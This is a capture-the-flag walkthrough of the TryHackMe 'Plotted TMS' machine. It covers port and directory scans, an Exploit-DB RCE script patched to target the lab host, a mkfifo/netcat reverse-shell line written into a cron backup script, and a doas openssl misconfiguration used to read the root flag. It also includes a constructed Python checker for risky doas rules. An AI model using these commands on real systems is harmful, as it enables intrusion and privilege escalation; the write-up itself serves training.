Plotted TMS

You can find this machine here: https://tryhackme.com/room/plottedtms

Port Scan

┌──(kali㉿Zeus)-[~]
└─$ sudo nmap -sS -sV 10.10.1.194   

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
445/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

Directory Scan Port 445

┌──(kali㉿Zeus)-[~]
└─$ dirb http://10.10.1.194:445           
<snip>
==> DIRECTORY: http://10.10.1.194:445/management/
==> DIRECTORY: http://10.10.1.194:445/management/admin/
==> DIRECTORY: http://10.10.1.194:445/management/assets/
==> DIRECTORY: http://10.10.1.194:445/management/build/
==> DIRECTORY: http://10.10.1.194:445/management/classes/
==> DIRECTORY: http://10.10.1.194:445/management/database/
<snip>

Traffic Offense Management System - Remote Code Execution (RCE) (Unauthenticated)

locate php/webapps/50221.py
cp /usr/share/exploitdb/exploits/php/webapps/50221.py .
2to3 -w 50221.py

There was an error in the script, so I edited line 107:

  • before
request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers)
  • after
request = requests.post("http://10.10.1.194:445"+find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers)

RCE Confirmed

Privilege Escalation - User Owned

  • Change the backup.sh content
rm -rf backup.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.18.45.56 5555 >/tmp/f" > backup.sh
chmod 777 backup.sh
chmod +x backup.sh

Privilege Escalation - Root Owned

plot_admin@plotted:~$ find / -perm -u=s -type f 2>/dev/null
<snip>
/usr/bin/doas
<snip>
  • Resource: https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas
  • Resource: https://gtfobins.github.io/gtfobins/openssl/#file-read
permit nopass plot_admin as root cmd openssl
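That single doas rule is the whole privilege boundary on this box: passwordless root for a binary that can read arbitrary files. As an added example that is not part of the writeup, the Python below parses doas.conf lines per doas.conf(5) and flags permit rules that reach root without a password and without pinned arguments, with a tightened rule shown beside the weak one. The sample config, the /srv/backup.tar path and the function names are constructed; the setenv option is not handled.

```python
# Constructed sample: the weak rule from the box, a tightened variant and a blanket grant.
SAMPLE_DOAS_CONF = """\
# passwordless root and any arguments: the rule abused in the writeup
permit nopass plot_admin as root cmd openssl
# password required and arguments pinned to the intended backup job
permit persist plot_admin as root cmd openssl args enc -in /srv/backup.tar
permit :wheel
"""
OPTIONS = {"nopass", "nolog", "persist", "keepenv"}  # setenv {...} is not handled here

def parse_rule(line):
    """Parse one doas.conf line per doas.conf(5); return None for blanks and comments."""
    body = line.split("#", 1)[0].strip()
    if not body:
        return None
    tok = body.split()
    if tok[0] not in ("permit", "deny"):
        raise ValueError(f"unrecognised rule: {line!r}")
    rule = {"action": tok[0], "options": set(), "identity": None,
            "target": None, "cmd": None, "args": None}
    i = 1
    while i < len(tok) and tok[i] in OPTIONS:  # options come before the identity
        rule["options"].add(tok[i])
        i += 1
    rule["identity"], i = tok[i], i + 1
    if i < len(tok) and tok[i] == "as":
        rule["target"] = tok[i + 1]
        i += 2
    if i < len(tok) and tok[i] == "cmd":
        rule["cmd"] = tok[i + 1]
        i += 2
        if i < len(tok) and tok[i] == "args":
            rule["args"] = tok[i + 1:]  # empty list means "no arguments allowed"
    return rule

def risky_rules(conf):
    """Return (line_no, reason) per permit rule; doas applies the LAST match, so review order too."""
    findings = []
    for n, line in enumerate(conf.splitlines(), 1):
        rule = parse_rule(line)
        if rule is None or rule["action"] != "permit":
            continue
        if rule["target"] not in (None, "root"):  # no "as" clause means any target user
            continue
        if rule["cmd"] is None:
            findings.append((n, "any command as root"))
        elif "nopass" in rule["options"] and rule["args"] is None:
            findings.append((n, f"nopass {rule['cmd']} as root with unrestricted args"))
    return findings
```

Running `risky_rules(SAMPLE_DOAS_CONF)` reports the openssl rule and the blanket `permit :wheel`, and stays quiet on the persist rule with pinned arguments.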

LFILE=/root/root.txt
doas -u root openssl enc -in "$LFILE"